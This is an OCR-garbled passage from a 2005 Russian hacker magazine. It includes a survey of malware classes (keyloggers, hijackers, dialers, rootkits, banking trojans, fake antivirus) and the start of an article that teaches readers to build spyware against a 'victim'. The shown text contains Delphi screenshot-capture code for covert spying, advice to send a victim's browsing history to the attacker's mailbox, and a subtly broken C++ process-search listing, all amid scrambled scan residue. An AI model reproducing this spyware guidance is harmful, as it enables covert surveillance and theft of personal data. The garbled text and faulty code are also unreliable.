DLL, скомпилированная по данному исходнику, экспортирует две функции: SetKeyHook для установки хука и DelKeyHook для его снятия. Работа самого перехватчика предельно проста, так как все клавиатурные события передаются окну с именем 'TKeyForm' для анализа и регистрации.

Многие кейлоггеры умеют не только записывать нажатия клавиш, но и делать скриншоты экрана с заданной периодичностью (или по заданному событию) и шпионить за содержимым буфера обмена, что реализуется очень просто. Для примера - простейший код, делающий снимки экрана че- рез некоторые промежутки времени:

procedure TForm1.Timer1Timer(Sender: TObject);

var

Image : TImage;

ScreenDC : HDC; begin

Image := TImage.Create(nil);

//Получаем размеры экрана Image.Width := Screen.Width; Image.Height := Screen.Height;

//Получаем контекст экрана ScreenDC := GetDC(0); BitBlt(Image.Canvas.Handle, 0, 0,

Image.Width, Image.Height,

ScreenDC, 0, 0, SRCCOPY);

ReleaseDC(0, ScreenDC);

Image.Picture.SaveToFile('scr_'+FormatDate Time('yyyymmddhhnnss', Now)+'.bmp'); Image.Free;

end;

Данный код должен вызываться по таймеру с некоторым интервалом.

HIJACKER

Буквальный перевод этого термина звучит как "налетчик", "грабитель". Типовой задачей программ класса Hijacker является перенастройка параметров браузера, электронной почты или других приложений без разрешения и ведома пользователя. В зарубежных источниках мне встре- чалось определение Hijacker как "утилиты, которая изменяет настройки браузера без ведома пользователя".

Чаще всего Hijacker применяется для изменения:

1.Стартовой страницы браузера (стартовая страница заменяется на адреса сайта создателей Hijacker);

2.Настройки системы поиска браузера (эти настройки хранятся в реестре; в результате этого изменения при нажатии кнопки "Поиск" открывается адрес, установленный программой Hijacker);

3.Уровней и настроек безопасности браузера;

4.Реакции браузера на ошибки (мне встречался Hijacker, который заменял стандартные странички IE, опи-

Многие кейлоггеры умеют не только записывать нажатия клавиш, но и делать скриншоты экрана с заданной периодичностью и шпионить за содержимым буфера обмена.

hang

NOW!

BUY

w Click

сывающие ошибки типа 404, на

-x cha

собственные); 5. Модификации списка адресов

("Избранное") браузера.

В чистом виде Hijacker встречается сравнительно редко, так как чаще всего по выполняемым действиям программу можно отнести к AdWare/Spyware или троянам. Собственно, Hijcker преследует те же цели, что и AdWare, - реклама и повышение рейтинга того или иного сайта. Типовым примером Hijacker может служить Trojan.Win32.StartPage.ui, имеющий несжатый размер около 4 Кб, который прописывает один из заданных в его теле URL в параметр Start Page ключа Software\Microsoft\Internet

Explorer\Main, а также умеет прописываться в автозапуск в ключе Software\Microsoft\Windows\CurrentV ersion\Run реестра.

DIALER

Dialer (или порнозвонилка - нена- учно, зато по существу) - это программа, предназначенная для дозвона на некий платный сервис (поэтому и страшна она для старых старичков, все еще выходящих в интернет по модему :)). По принципу работы можно выделить несколько разновидностей Dialer:

1.Автономные звонилки – программы, предназначенные для дозвона.

2.Добавляющие соединения удаленного доступа. Звонить не умеют, вместо этого создают одно (или несколько) соединений удаленного доступа.

3.Модифицирующие соединение удаленного доступа (порнозвонилки самой зловредной разновидности, так как они модифицируют существующие соединения, записывая туда новые телефонные номера).

Кроме порнозвонилок, можно выделить еще один класс программ, я называю их "порноскопами". Эти программы предназначены для соединения с неким закрытым сайтом, могут иметь встроенный прокси-сервер и прочие навороты. Как правило, такую программу тоже относят к категории Dialer или выделяют в отдельный класс PornDownloader.

ROOTKIT

RootKit - это программа, которая внедряется в систему и производит перехват API-функций или модификацию их машинного кода. В результате RootKit может влиять на поведение системы, в частности, маскировать файлы на диске, процессы, ключи реестра. Кроме того, RootKit является API-шпионом, то есть он может отслеживать вызовы перехваченных им функций и протоколировать их.

RootKit можно разделить на две большие категории: UserMode и KernelMode.

Самым известным представителем UserMode является HackerDefender,

ХАКЕРСПЕЦ 11(60) 2005

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D									r
P						NOW!				o
P
					BUY
				to	BUY
w Click				to							m
w Click											m
w
	w									o
	.							выполненный в виде самостоятельно-
	.							.c
		p					g
			df			n		e
				-xcha

го продукта, который может конфигурироваться пользователем при помощи ini-файла. Принцип работы HackerDefender основан на перехвате ряда API-функций путем подмены первых пяти байт машинного кода функции на JMP, указывающей на его функцию-перехватчик. Данная методика не совсем корректна, так как для вызова перехваченной функции ему приходится восстанавливать ее машинный код, производить вызов и заново записывать в начало функции JMP. Тем не менее, метод вполне рабочий, исходники HackerDefender открыты, и это привело к появлению множества его "клонов".

Из KernelMode RootKit наиболее знаменит BackDoor.Haxdoor. Он устанавливает несколько драйверов, перехватывает ряд функций в KiST, что позволяет ему достаточно эффективно маскироваться от обнаружения пользователем.

Практика показывает, что разработ- чики вредоносных программ (вирусов, троянских программ, шпионского ПО) все чаще начинают использовать RootKit-технологии, что существенно затрудняет обнаружение и удаление созданных ими вредоносных программ. По статистике, AdWare/SpyWare чаще всего применяют методики перехвата функций в режиме пользователя.

TROJAN-SPY

Как показывает их название, это шпионы в чистом виде. Приставка Trojan сигнализирует об их однознач- ной вредоносности. К этой категории принято относить наиболее опасные разновидности кейлоггеров, а также всевозможные троянские программы для шпионажа за пользователем. Самый типичный пример - TrojanSpy.Win32.Banker. Программы данного семейства нацелены на воровство номеров кредитных карт. Некоторые подобные звери применяют изощренные методы внедрения в системы и обходят многие Firewall'ы. Рассмотрим типовой пример такого "зверя" на примере Banker, который устанавливает драйвер iesprt.sys размером всего 16 Кб, однако вот результат:

1.1Поиск перехватчиков API, работающих в UserMode

Функция ntdll.dll:LdrLoadDll (70) перехва- чена, метод APICodeHijack.JmpTo Функция wininet.dll:HttpSendRequestA (207) перехвачена, метод APICodeHijack.JmpTo

1.2Поиск перехватчиков API, работающих в KernelMode

Функция ZwCreateProcess (2F) перехваче- на (805B3543->F9E57219), перехватчик C:\WINDOWS\system32\iesprt.sys

Функция ZwCreateProcessEx (30) перехва- чена (805885D3->F9E57280), перехватчик C:\WINDOWS\system32\iesprt.sys Проверено функций: 284, перехвачено: 2, восстановлено: 0.

		57
Логика работы "зверя" такова: драй-		который подменяет обои на рабочем
вер перехватывает ZwCreateProcess,		столе (при этом блокируя меню их
что позволяет ему отследить запуск		восстановления) и загружает на
процессов; в запускаемые процессы		компьютер "супер-антиспайвер"
он внедряет свой перехватчик		SpywareNo, который тут же бодро кри-
UserMode, перехватывая LdrLoadDll.		чит о том, что на ПК обнаружено штук
Последнее позволяет ему отловить		15 троянов и шпионов (куча кейлогге-
загрузку библиотек и в момент заг-		ров, троянов, флудеров, шпионов -
рузки wininet.dll перехватить		список длинный). Для лечения нужен
HttpSendRequestA (метод перехвата		ключ, но на три дня дают пробный,
типовой - подмена первых пяти байт		при его получении совершается чудо:
функции на JMP). Дальше все просто.		все "шпионы" немедленно "исцеляют-
Перехват этой функции предоставля-		ся", и рабочий стол приводится в по-
ет трояну контроль над работой при-		рядок, так что результат "лечения"
ложения с интернетом (конечно, при		налицо. Далее за продолжение защи-
условии что она работает через ука-		ты программа скромно просит всего
занную функцию wininet.dll, но для		38 евро в год :). Этот монстр - один из
Internet Explorer это справедливо).		наиболее находчивых Hoax, так как
		более простые, типа Hoax.AvGold,
HOAX		просто прописываются в автозапуск и
	Данная категория программ поя-	периодически пугают пользователя


вилась сравнительно недавно. В бук-		из всплывающих окон или трея тем,
вальном переводе Hoax - это "обман,		что их "компьютер заражен вредонос-
ложь, мистификация". Соответствен-		ной программой и для ее лечения
но, непосредственная задача Hoax-		нужно купить супер-пуперантивирус
программы - обман пользователя. К		AvGold" (собственно, отсюда и назва-
примеру, известен Hoax.Win32.Renos,		ние этого "зверя"). E

Рабочий стол системы после Hoax.AvGold

"Суперантивирус" AvGold

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i	r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to							m
w Click											m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha				Ó Ã Ð Î Ç À
								Ó Ã Ð Î Ç À
								Ñ Ê Ð Û Ò À ß

hang

NOW!

BUY

КОМПЬЮТЕРНАЯ РАЗВЕДКА

ВИРТУАЛЬНЫЙШПИОН

w Click

Tony (porco@argentina.com)

Ð Î Ç À

-xcha

ВИРТУАЛЬНЫЙ

Ó Ã

ШПИОН

Ò À ß

СОЗДАНИЕ ЭЛЕКТРОННОГО ШТИРЛИЦА

Ð Û

та статья поможет тебе в создании собственной программы-шпиона. Здесь ты не найдешь готовых ответов на все

Ýвопросы, но получишь список действенных рецептов и тропинок для труднодоступных мест, по которым тебе

необходимо прошагать, чтобы найти свой Грааль.

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

SYNOPSIS

» Когда я начинал работать над этой статьей, мне казалось, что я создам универсальный

инструмент, и, слегка модифицировав его, любой сможет получить действенный способ добычи данных с отдельно взятого пользователя. Время, проведенное за пристальным изу- чением материала и написанием кода, убило все мои амбиции. Конечно, не из-за сложности задачи или отсутствия документации, а из-за разнообразия программного обеспечения, используемого пользователями, различных подходов к безопасности рабочего места, стандартов хранения и передачи данных. Я не стал создавать очередного агента 007, но изложил несколько примеров, которые иллюстрируют все описанные в статье приемы и трюки.

3RD PARTY

Человеку, всерьез желающему вести слежку за определенным компьютерным существом, скорее всего, не подойдут существующие (в паблике ;)) шпионы из-за их недостаточной функциональности, заметности их работы, невозможности установить программу удаленно и т.д. Неудивительно. Ведение слежки – это, в первую очередь, творческий процесс, который зависит от подготовленности

Простейший анализатор истории webсерфинга

жертвы, доступности ее рабочего места, воображения следящего и нали- чия/отсутствия паранойи у системного администратора. Любая сколь угодно совершенная программа не в состоянии предоставить тебе всех нужных данных. Однако в некоторых слу- чаях имеет смысл использовать удобный и готовый к употреблению инструментарий. Типичный пример – информация о посещенных web-сай- тах. Если жертва пользуется ишач- ком, то эта информация сохраняется в каталоге Documents and Settings\User\Local Settings\History\History.IE5. Незачем вводить парсер этих данных в свой шпион, если можно сжать и переслать их для анализа в свой почтовый ящик. Далее можно взять программу Red Cliff Web Historian для анализа ис-

торий путешествий ишака, которая вытащит все имена и явки скачиваемых файлов плюс сохранит их в формате таблицы Excel. Итак, мораль: необходимо использовать существующий код и инструменты максимально.

УПРОЩЕНИЕ ЗАДАЧИ

Перед началом слежки раскопай максимум информации о программном обеспечении, установленном на компьютере жертвы. Возможно, для этого потребуется дополнительный шпион или сканер, например Shadow Security Scaner. Для упрощения материала будем считать, что у нашего клиента стоит одна из NT-операцио- нок, пусть Windows XP SP2. Также будем считать, что ты уже проник в эту систему и можешь делать с ней все, что тебе заблагорассудится. Первое

ЛИСТИНГ ¹ 1. ПОИСК ПРОЦЕССА ПО ИМЕНИ

#include <string> #include <Tlhelp32.h>

//pName – имя искомого процесса

//Возвращает true, если такой процесс запущен, и false в противном случае bool IsProcessRunning( char * pName )

{

strlwr( pName );

HANDLE snapshot = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 ); PROCESSENTRY32 pe;

char pExeName[256];

for( BOOL r=Process32First(snapshot, &pe); r; r=Process32Next(snapshot, &pe) )

{

strcpy(pExeName, pe.szExeFile); strlwr(pExeName);

if( std::string(pName)==pExeName )

{

CloseHandle(snapshot); return true;

}

CloseHandle(snapshot); return false;

}

ХАКЕРСПЕЦ 11(60) 2005

<<< < Предыдущая 1 2 3 4 56 / 146 7 8 9 10 11 12 13 14 > Следующая >>>

Соседние файлы в папке специальные выпуски

#
20.04.202411.28 Mб16Специальный выпуск 55_Optimized.pdf
#
20.04.202411.84 Mб17Специальный выпуск 56_Optimized.pdf
#
20.04.202411.64 Mб21Специальный выпуск 57_Optimized.pdf
#
20.04.202410.89 Mб16Специальный выпуск 58_Optimized.pdf
#
20.04.20248.1 Mб15Специальный выпуск 59_Optimized.pdf
#
20.04.20248.56 Mб16Специальный выпуск 60_Optimized.pdf
#
20.04.20245.33 Mб14Специальный выпуск 61_Optimized.pdf
#
20.04.20246.11 Mб16Специальный выпуск 62_Optimized.pdf
#
20.04.202421.69 Mб15Специальный выпуск 63_Optimized.pdf
#
20.04.20246.34 Mб15Специальный выпуск 64_Optimized.pdf
#
20.04.20244.8 Mб15Специальный выпуск 65_Optimized.pdf